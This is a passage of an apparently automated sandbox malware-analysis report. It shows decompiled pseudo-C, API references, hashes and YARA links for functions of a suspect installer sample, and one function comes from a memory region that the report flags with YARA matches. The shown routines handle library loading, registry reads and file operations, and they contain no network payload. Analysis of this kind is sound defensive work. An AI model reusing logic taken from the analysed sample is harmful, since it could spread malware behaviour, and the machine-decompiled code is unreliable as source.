                                                                                    • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                    • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                    • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                    • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 60%
                                                                                    			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a320");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                    0x004020d8
                                                                                    0x004020d8
                                                                                    0x004020dd
                                                                                    0x004020e4
                                                                                    0x004021a3
                                                                                    0x004022f1
                                                                                    0x004022f1
                                                                                    0x00402c2a
                                                                                    0x00402c2d
                                                                                    0x00402c39
                                                                                    0x00402c39
                                                                                    0x004020f3
                                                                                    0x004020fd
                                                                                    0x00402100
                                                                                    0x00402110
                                                                                    0x00402114
                                                                                    0x0040211a
                                                                                    0x0040211c
                                                                                    0x0040211f
                                                                                    0x0040219c
                                                                                    0x00000000
                                                                                    0x0040219c
                                                                                    0x00402121
                                                                                    0x0040212c
                                                                                    0x00402130
                                                                                    0x00402170
                                                                                    0x00402132
                                                                                    0x00402135
                                                                                    0x00402138
                                                                                    0x00402164
                                                                                    0x0040213a
                                                                                    0x0040213d
                                                                                    0x00402146
                                                                                    0x00402148
                                                                                    0x00402148
                                                                                    0x00402146
                                                                                    0x00402138
                                                                                    0x00402178
                                                                                    0x00402191
                                                                                    0x00402191
                                                                                    0x00000000
                                                                                    0x00402178
                                                                                    0x00402103
                                                                                    0x0040210b
                                                                                    0x0040210e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                    • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 334405425-0
                                                                                    • Opcode ID: 9827fd94f98204bc0f6ca575420b9fb8169308b6b5ad793bf72786e172b03264
                                                                                    • Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
                                                                                    • Opcode Fuzzy Hash: 9827fd94f98204bc0f6ca575420b9fb8169308b6b5ad793bf72786e172b03264
                                                                                    • Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004022FF Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004022FF(void* __eflags) {
				WCHAR* _t34;
				WCHAR* _t37;
				WCHAR* _t39;
				void* _t41;

				_t39 = E00402DA6(_t34);
				_t37 = E00402DA6(0x11);
				 *((intOrPtr*)(_t41 + 8)) = E00402DA6(0x23);
				if(E0040699E(_t39) != 0) {
					 *(_t41 - 0x70) =  *(_t41 - 8);
					 *((intOrPtr*)(_t41 - 0x6c)) = 2;
					 *((short*)(_t39 + 2 + lstrlenW(_t39) * 2)) = _t34;
					 *((short*)(_t37 + 2 + lstrlenW(_t37) * 2)) = _t34;
					_t27 =  *((intOrPtr*)(_t41 + 8));
					 *(_t41 - 0x68) = _t39;
					 *(_t41 - 0x64) = _t37;
					 *((intOrPtr*)(_t41 - 0x56)) =  *((intOrPtr*)(_t41 + 8));
					 *((short*)(_t41 - 0x60)) =  *((intOrPtr*)(_t41 - 0x28));
					E004056CA(_t34, _t27);
					if(SHFileOperationW(_t41 - 0x70) != 0) {
						goto L1;
					}
				} else {
					L1:
					E004056CA(0xfffffff9, _t34); // executed
					 *((intOrPtr*)(_t41 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t41 - 4));
				return 0;
			}







                                                                                    0x00402307
                                                                                    0x00402310
                                                                                    0x00402318
                                                                                    0x00402322
                                                                                    0x00402335
                                                                                    0x00402338
                                                                                    0x00402345
                                                                                    0x0040234f
                                                                                    0x00402354
                                                                                    0x0040235d
                                                                                    0x00402360
                                                                                    0x00402363
                                                                                    0x00402366
                                                                                    0x0040236a
                                                                                    0x0040237b
                                                                                    0x00000000
                                                                                    0x00402381
                                                                                    0x00402324
                                                                                    0x00402324
                                                                                    0x00402327
                                                                                    0x0040292e
                                                                                    0x0040292e
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                      • Part of subcall function 0040699E: FindFirstFileW.KERNELBASE(?,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50, 4!u.!u,?,75212EE0,00405D94,?,75213420,75212EE0), ref: 004069A9
                                                                                      • Part of subcall function 0040699E: FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                    • lstrlenW.KERNEL32 ref: 0040233F
                                                                                    • lstrlenW.KERNEL32(00000000), ref: 0040234A
                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402373
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                    • String ID:
                                                                                    • API String ID: 1486964399-0
                                                                                    • Opcode ID: c5d22b9d8a71c95f652df3de310a90e098c7405d7c9a4b16c813a7930b9de309
                                                                                    • Instruction ID: efe7ca38dbb9f63e5b96a486a7b13937429123450804d9b7efa9de18d425087e
                                                                                    • Opcode Fuzzy Hash: c5d22b9d8a71c95f652df3de310a90e098c7405d7c9a4b16c813a7930b9de309
                                                                                    • Instruction Fuzzy Hash: 7A117071900318AADB10EFF9CA49E9EB6F8BF04344F10443BE505F72D1E6B9C8548B59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 86%
                                                                                    			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402DE6(_t29, 0x20019); // executed
				_t24 = _t9;
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
					}
					_t22[0x3ff] = _t16;
					_push(_t24); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}












                                                                                    0x0040259e
                                                                                    0x0040259e
                                                                                    0x0040259e
                                                                                    0x004025a3
                                                                                    0x004025aa
                                                                                    0x004025ac
                                                                                    0x004025b4
                                                                                    0x004025b7
                                                                                    0x004025ba
                                                                                    0x0040292e
                                                                                    0x004025c0
                                                                                    0x004025c8
                                                                                    0x004025cb
                                                                                    0x004025e4
                                                                                    0x004025ea
                                                                                    0x004025ec
                                                                                    0x004025ee
                                                                                    0x004025ee
                                                                                    0x004025cd
                                                                                    0x004025d1
                                                                                    0x004025d1
                                                                                    0x004025f5
                                                                                    0x004025fc
                                                                                    0x004025fd
                                                                                    0x004025fd
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                    • RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 004025E4
                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsg40B0.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Enum$CloseValue
                                                                                    • String ID:
                                                                                    • API String ID: 397863658-0
                                                                                    • Opcode ID: 08bf4effff3d80e768a419a8ff2de849f140278fe942a312e0580abaf826dc6a
                                                                                    • Instruction ID: fdd171a53236be04b49e80cc8c25aaf428e2db1c32e81cf7e645575326a8d696
                                                                                    • Opcode Fuzzy Hash: 08bf4effff3d80e768a419a8ff2de849f140278fe942a312e0580abaf826dc6a
                                                                                    • Instruction Fuzzy Hash: 35017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61D0EBB85E45966D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 03392FC9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnumWindows.USER32(000000AA,0000005B,000000AA,00000000,?,03392C71), ref: 03393034
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, Offset: 03391000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_3391000_SecuriteInfo.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnumWindows
                                                                                    • String ID: oS
                                                                                    • API String ID: 1129996299-2044587645
                                                                                    • Opcode ID: a086f9ed89441de1cc83b94d6f4013541cf8725f8df57a3fd9c7b6f4481ca44c
                                                                                    • Instruction ID: 174e17a4f6901bc17fe653d1d93f317df12d0875e1e5b6c187e69344dd92e8c6
                                                                                    • Opcode Fuzzy Hash: a086f9ed89441de1cc83b94d6f4013541cf8725f8df57a3fd9c7b6f4481ca44c
                                                                                    • Instruction Fuzzy Hash: 23218E7AC196A8CFEF21EF248C511D67BAAEF86704F2988ABCD449F605C3318D01C791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004064D5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004064D5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406454(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                                                    0x004064df
                                                                                    0x004064e6
                                                                                    0x004064f9
                                                                                    0x00000000
                                                                                    0x004064f9
                                                                                    0x004064ea
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422728,?,('B,00406563,('B,00000000,?,?,Call,?), ref: 004064F9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID: ('B
                                                                                    • API String ID: 71445658-2332581011
                                                                                    • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                    • Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
                                                                                    • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                    • Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 92%
                                                                                    			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004061DB( *0x40a01c, 0x414ef0, _t28) == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                                                    0x00403375
                                                                                    0x0040337e
                                                                                    0x00403387
                                                                                    0x0040338b
                                                                                    0x00403396
                                                                                    0x00403396
                                                                                    0x0040339e
                                                                                    0x004033a5
                                                                                    0x004033b7
                                                                                    0x004033be
                                                                                    0x00403463
                                                                                    0x00403463
                                                                                    0x00000000
                                                                                    0x004033c4
                                                                                    0x004033c7
                                                                                    0x004033d3
                                                                                    0x004033d7
                                                                                    0x00403471
                                                                                    0x00403471
                                                                                    0x004033dd
                                                                                    0x004033e0
                                                                                    0x0040343f
                                                                                    0x00403445
                                                                                    0x00403447
                                                                                    0x00403447
                                                                                    0x00403459
                                                                                    0x00403461
                                                                                    0x00403468
                                                                                    0x0040346b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004033e2
                                                                                    0x004033e5
                                                                                    0x00000000
                                                                                    0x004033eb
                                                                                    0x004033f0
                                                                                    0x004033f7
                                                                                    0x004033fa
                                                                                    0x004033fc
                                                                                    0x004033fc
                                                                                    0x00403409
                                                                                    0x00403413
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040341c
                                                                                    0x00403423
                                                                                    0x0040343b
                                                                                    0x00403465
                                                                                    0x00403465
                                                                                    0x00403425
                                                                                    0x00403425
                                                                                    0x00403428
                                                                                    0x0040342b
                                                                                    0x00403431
                                                                                    0x00403437
                                                                                    0x00000000
                                                                                    0x00403439
                                                                                    0x00000000
                                                                                    0x00403439
                                                                                    0x00403437
                                                                                    0x00000000
                                                                                    0x00403423
                                                                                    0x00000000
                                                                                    0x004033f0
                                                                                    0x004033e5
                                                                                    0x004033e0
                                                                                    0x004033d7
                                                                                    0x004033be
                                                                                    0x00403473
                                                                                    0x00403476

                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                    • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                    • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                    • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 84%
                                                                                    			E0040252A(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402DE6(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E004065AF(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2e8 =  *0x42a2e8 +  *(_t37 - 4);
				return 0;
			}








                                                                                    0x0040252a
                                                                                    0x0040252a
                                                                                    0x0040252f
                                                                                    0x00402536
                                                                                    0x00402538
                                                                                    0x0040253f
                                                                                    0x00402542
                                                                                    0x0040292e
                                                                                    0x00402548
                                                                                    0x0040254b
                                                                                    0x00402566
                                                                                    0x00402596
                                                                                    0x00402596
                                                                                    0x00402599
                                                                                    0x00402568
                                                                                    0x0040256c
                                                                                    0x00402585
                                                                                    0x0040258c
                                                                                    0x0040258f
                                                                                    0x0040256e
                                                                                    0x00402571
                                                                                    0x0040257c
                                                                                    0x004025f5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402571
                                                                                    0x0040256c
                                                                                    0x004025fc
                                                                                    0x004025fd
                                                                                    0x004025fd
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsg40B0.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3356406503-0
                                                                                    • Opcode ID: 0ea4f6718fdcbdc150d78e7b077cde1f0ae7298827167d5f6fba062dc71c731e
                                                                                    • Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
                                                                                    • Opcode Fuzzy Hash: 0ea4f6718fdcbdc150d78e7b077cde1f0ae7298827167d5f6fba062dc71c731e
                                                                                    • Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 69%
                                                                                    			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0); // executed
					}
				}
				return 0;
			}










                                                                                    0x0040138a
                                                                                    0x004013fa
                                                                                    0x0040139b
                                                                                    0x004013a0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004013a2
                                                                                    0x004013a3
                                                                                    0x004013ad
                                                                                    0x00000000
                                                                                    0x00401404
                                                                                    0x004013b0
                                                                                    0x004013b7
                                                                                    0x004013bd
                                                                                    0x004013be
